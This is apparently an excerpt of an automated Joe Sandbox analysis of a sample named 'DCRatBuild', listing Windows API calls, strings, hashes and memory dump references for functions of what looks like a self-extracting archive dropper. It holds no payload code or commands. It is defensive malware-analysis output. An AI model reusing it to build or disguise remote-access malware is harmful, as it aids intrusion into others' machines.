                                  • API String ID: 1269201914-0
                                  • Opcode ID: bc828d09cecc36c97cefc2b8e3263cf48d36e4deaa736fd72104054dda2f25ec
                                  • Instruction ID: 4562eafccd0a9fab563fbdf9f669ee13b472d0fe884c0bb8ab1426627a6d5778
                                  • Opcode Fuzzy Hash: bc828d09cecc36c97cefc2b8e3263cf48d36e4deaa736fd72104054dda2f25ec
                                  • Instruction Fuzzy Hash: 8EA0029527D2467C710851566D17D76021CE4C5B653315919B50AD41C16E505C4D5471
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 5dd79bb65b9e879655c2fd485936d52917669bf5dc367c4845d6808cb1d6a0fc
                                  • Instruction ID: 4562eafccd0a9fab563fbdf9f669ee13b472d0fe884c0bb8ab1426627a6d5778
                                  • Opcode Fuzzy Hash: 5dd79bb65b9e879655c2fd485936d52917669bf5dc367c4845d6808cb1d6a0fc
                                  • Instruction Fuzzy Hash: 8EA0029527D2467C710851566D17D76021CE4C5B653315919B50AD41C16E505C4D5471
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: ebfafd9586e000d981c823a0f9b594d0e0ddb1d5a7a0edbec5a1f9477d404e07
                                  • Instruction ID: 4562eafccd0a9fab563fbdf9f669ee13b472d0fe884c0bb8ab1426627a6d5778
                                  • Opcode Fuzzy Hash: ebfafd9586e000d981c823a0f9b594d0e0ddb1d5a7a0edbec5a1f9477d404e07
                                  • Instruction Fuzzy Hash: 8EA0029527D2467C710851566D17D76021CE4C5B653315919B50AD41C16E505C4D5471
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDBD5
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: e620d1957a75fd97d4a4af3b1f6657bdc556450a4e67c6f6299fb77a53e63a21
                                  • Instruction ID: 4562eafccd0a9fab563fbdf9f669ee13b472d0fe884c0bb8ab1426627a6d5778
                                  • Opcode Fuzzy Hash: e620d1957a75fd97d4a4af3b1f6657bdc556450a4e67c6f6299fb77a53e63a21
                                  • Instruction Fuzzy Hash: 8EA0029527D2467C710851566D17D76021CE4C5B653315919B50AD41C16E505C4D5471
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDC36
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 366cec5da351ef87480704b067ede846adcd73c3b0f833af1c59b77b968a11e2
                                  • Instruction ID: 18f4bb1d4ca5281bbbb39499cf4b9974a79bb69d16d680cf6be4999e6bd2e6f0
                                  • Opcode Fuzzy Hash: 366cec5da351ef87480704b067ede846adcd73c3b0f833af1c59b77b968a11e2
                                  • Instruction Fuzzy Hash: E0A0029556D746BC710C61566D16D7A021CD5C5F953304919B506D41D159805C4D5471
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EDC36
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 07d34378e4314cd046da9dfe6078b29eb51f52adc67a0708436a683b2e1d80ca
                                  • Instruction ID: 18f4bb1d4ca5281bbbb39499cf4b9974a79bb69d16d680cf6be4999e6bd2e6f0
                                  • Opcode Fuzzy Hash: 07d34378e4314cd046da9dfe6078b29eb51f52adc67a0708436a683b2e1d80ca
                                  • Instruction Fuzzy Hash: E0A0029556D746BC710C61566D16D7A021CD5C5F953304919B506D41D159805C4D5471
                                  APIs
                                  • SetEndOfFile.KERNELBASE(?,008D9104,?,?,-00001964), ref: 008D9EC2
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: File
                                  • String ID:
                                  • API String ID: 749574446-0
                                  • Opcode ID: 7bd3d95b012104f6c13b37da22cbdfd21514261a0c6616057f20c3abfa9c6062
                                  • Instruction ID: 9740190c54aa35656106ecd73976e1748d6889435299af665dd8d7d5ffc4256c
                                  • Opcode Fuzzy Hash: 7bd3d95b012104f6c13b37da22cbdfd21514261a0c6616057f20c3abfa9c6062
                                  • Instruction Fuzzy Hash: C4B011300BA00A8ACE002F30CC088283A28EA2230A30082A0A002CA0A0CB22C002AA00
                                  APIs
                                  • SetCurrentDirectoryW.KERNELBASE(?,008EA587,C:\Users\user\AppData\Local\Temp\RarSFX0,00000000,0091946A,00000006), ref: 008EA326
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory
                                  • String ID:
                                  • API String ID: 1611563598-0
                                  • Opcode ID: bf4b2be3301dd171c64497ab186c7a5bfbcb8d0dfa60031365e5a38366b8fb76
                                  • Instruction ID: fd9200fc1dbd723d01f2f21724b758c1142ba2b817e7950994154a1abaea17f8
                                  • Opcode Fuzzy Hash: bf4b2be3301dd171c64497ab186c7a5bfbcb8d0dfa60031365e5a38366b8fb76
                                  • Instruction Fuzzy Hash: E5A012301AC0065ACA000B30CC09C1576545760702F00C6207002C00A0CB308814B500
                                  APIs
                                    • Part of subcall function 008D130B: GetDlgItem.USER32(00000000,00003021), ref: 008D134F
                                    • Part of subcall function 008D130B: SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365
                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 008EB971
                                  • EndDialog.USER32(?,00000006), ref: 008EB984
                                  • GetDlgItem.USER32(?,0000006C), ref: 008EB9A0
                                  • SetFocus.USER32(00000000), ref: 008EB9A7
                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 008EB9E1
                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 008EBA18
                                  • FindFirstFileW.KERNEL32(?,?), ref: 008EBA2E
                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008EBA4C
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 008EBA5C
                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 008EBA78
                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 008EBA94
                                  • _swprintf.LIBCMT ref: 008EBAC4
                                    • Part of subcall function 008D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D401D
                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 008EBAD7
                                  • FindClose.KERNEL32(00000000), ref: 008EBADE
                                  • _swprintf.LIBCMT ref: 008EBB37
                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 008EBB4A
                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 008EBB67
                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 008EBB87
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 008EBB97
                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 008EBBB1
                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 008EBBC9
                                  • _swprintf.LIBCMT ref: 008EBBF5
                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 008EBC08
                                  • _swprintf.LIBCMT ref: 008EBC5C
                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 008EBC6F
                                    • Part of subcall function 008EA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 008EA662
                                    • Part of subcall function 008EA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0090E600,?,?), ref: 008EA6B1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                  • API String ID: 797121971-1840816070
                                  • Opcode ID: ec855610cff4bc84921516e56be8d7e997df926d9bdc9c2db251b575d700522c
                                  • Instruction ID: 95d6804927cecdd7dee81581db5a8a933e9673be3960758f40019dc7ec0a0fea
                                  • Opcode Fuzzy Hash: ec855610cff4bc84921516e56be8d7e997df926d9bdc9c2db251b575d700522c
                                  • Instruction Fuzzy Hash: BF91C4B210C388BFD621DBA5DD49FFB7BACFB8A704F004819B749D2091D7719A049B62
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008D7191
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008D72F1
                                  • CloseHandle.KERNEL32(00000000), ref: 008D7301
                                    • Part of subcall function 008D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 008D7C04
                                    • Part of subcall function 008D7BF5: GetLastError.KERNEL32 ref: 008D7C4A
                                    • Part of subcall function 008D7BF5: CloseHandle.KERNEL32(?), ref: 008D7C59
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 008D730C
                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 008D741A
                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 008D7446
                                  • CloseHandle.KERNEL32(?), ref: 008D7457
                                  • GetLastError.KERNEL32 ref: 008D7467
                                  • RemoveDirectoryW.KERNEL32(?), ref: 008D74B3
                                  • DeleteFileW.KERNEL32(?), ref: 008D74DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                  • API String ID: 3935142422-3508440684
                                  • Opcode ID: 18b61da74369e4d301b939161465c503239238ffb1f37efc4987aeb17de8db0e
                                  • Instruction ID: 35f8ca49896ad2682e0b367d3e212477e600c9b690f82cf399af291f6ab826ab
                                  • Opcode Fuzzy Hash: 18b61da74369e4d301b939161465c503239238ffb1f37efc4987aeb17de8db0e
                                  • Instruction Fuzzy Hash: 6CB1C071904219AEDF21DB64DC45BEE77B8FF04304F00466AFA49E7242EB74AA49CB61
                                  APIs
                                  • _swprintf.LIBCMT ref: 008DDABE
                                    • Part of subcall function 008D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D401D
                                    • Part of subcall function 008E1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00910EE8,00000200,008DD202,00000000,?,00000050,00910EE8), ref: 008E15B3
                                  • _strlen.LIBCMT ref: 008DDADF
                                  • SetDlgItemTextW.USER32(?,0090E154,?), ref: 008DDB3F
                                  • GetWindowRect.USER32(?,?), ref: 008DDB79
                                  • GetClientRect.USER32(?,?), ref: 008DDB85
                                  • GetWindowLongW.USER32(?,000000F0), ref: 008DDC25
                                  • GetWindowRect.USER32(?,?), ref: 008DDC52
                                  • SetWindowTextW.USER32(?,?), ref: 008DDC95
                                  • GetSystemMetrics.USER32(00000008), ref: 008DDC9D
                                  • GetWindow.USER32(?,00000005), ref: 008DDCA8
                                  • GetWindowRect.USER32(00000000,?), ref: 008DDCD5
                                  • GetWindow.USER32(00000000,00000002), ref: 008DDD47
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                  • String ID: $%s:$CAPTION$d
                                  • API String ID: 2407758923-2512411981
                                  • Opcode ID: 1c970d71fc9cd9a6bc977fe566a1f15a144bda5845da8e6d50c68270dfeaef68
                                  • Instruction ID: 9be1156b72aa7d909680e60496765a340cc0816a41151fd9ef4ee6f94abaf856
                                  • Opcode Fuzzy Hash: 1c970d71fc9cd9a6bc977fe566a1f15a144bda5845da8e6d50c68270dfeaef68
                                  • Instruction Fuzzy Hash: 9F818171108301AFD710DFA8CD89A6BBBE9FB89704F044A1EFA84D3291D670E905CB52
                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 008FC277
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE2F
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE41
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE53
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE65
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE77
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE89
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE9B
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBEAD
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBEBF
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBED1
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBEE3
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBEF5
                                    • Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBF07
                                  • _free.LIBCMT ref: 008FC26C
                                    • Part of subcall function 008F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?), ref: 008F84F4
                                    • Part of subcall function 008F84DE: GetLastError.KERNEL32(?,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?,?), ref: 008F8506
                                  • _free.LIBCMT ref: 008FC28E
                                  • _free.LIBCMT ref: 008FC2A3
                                  • _free.LIBCMT ref: 008FC2AE
                                  • _free.LIBCMT ref: 008FC2D0
                                  • _free.LIBCMT ref: 008FC2E3
                                  • _free.LIBCMT ref: 008FC2F1
                                  • _free.LIBCMT ref: 008FC2FC
                                  • _free.LIBCMT ref: 008FC334
                                  • _free.LIBCMT ref: 008FC33B
                                  • _free.LIBCMT ref: 008FC358
                                  • _free.LIBCMT ref: 008FC370
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID:
                                  • API String ID: 161543041-0
                                  • Opcode ID: b5a65756fec3791a95d1c6679a8098ed714f569e2a11efb9544326960c09951a
                                  • Instruction ID: 70c37e66a1f93f9cc8abfb285fd5b0ac136966304abe706eb95aa065a8976409
                                  • Opcode Fuzzy Hash: b5a65756fec3791a95d1c6679a8098ed714f569e2a11efb9544326960c09951a
                                  • Instruction Fuzzy Hash: 85319C3260020EDFEB20AA7CDA45B7A73E9FF00350F108869E648D7691DF31AE40CB25
                                  APIs
                                  • GetWindow.USER32(?,00000005), ref: 008ECD51
                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 008ECD7D
                                    • Part of subcall function 008E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008DBB05,00000000,.exe,?,?,00000800,?,?,008E85DF,?), ref: 008E17C2
                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 008ECD99
                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 008ECDB0
                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 008ECDC4
                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 008ECDED
                                  • DeleteObject.GDI32(00000000), ref: 008ECDF4
                                  • GetWindow.USER32(00000000,00000002), ref: 008ECDFD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                  • String ID: STATIC
                                  • API String ID: 3820355801-1882779555
                                  • Opcode ID: 911791e7fd86ed41a100f2eb6d21b16b2aaeba9c5fa7ad350c29d0cd13803ff3
                                  • Instruction ID: e158e774a6aa35c6f1a6c0ba732d7fcd29324c8b8cc41a812ff9f7e77e9dfbf1
                                  • Opcode Fuzzy Hash: 911791e7fd86ed41a100f2eb6d21b16b2aaeba9c5fa7ad350c29d0cd13803ff3
                                  • Instruction Fuzzy Hash: BB113A32A48391BBE3206B65DC09FAF365CFF42740F004020FB42E10D2CA608D169AA1
                                  APIs
                                  • _free.LIBCMT ref: 008F8EC5
                                    • Part of subcall function 008F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?), ref: 008F84F4
                                    • Part of subcall function 008F84DE: GetLastError.KERNEL32(?,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?,?), ref: 008F8506
                                  • _free.LIBCMT ref: 008F8ED1
                                  • _free.LIBCMT ref: 008F8EDC
                                  • _free.LIBCMT ref: 008F8EE7
                                  • _free.LIBCMT ref: 008F8EF2
                                  • _free.LIBCMT ref: 008F8EFD
                                  • _free.LIBCMT ref: 008F8F08
                                  • _free.LIBCMT ref: 008F8F13
                                  • _free.LIBCMT ref: 008F8F1E
                                  • _free.LIBCMT ref: 008F8F2C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
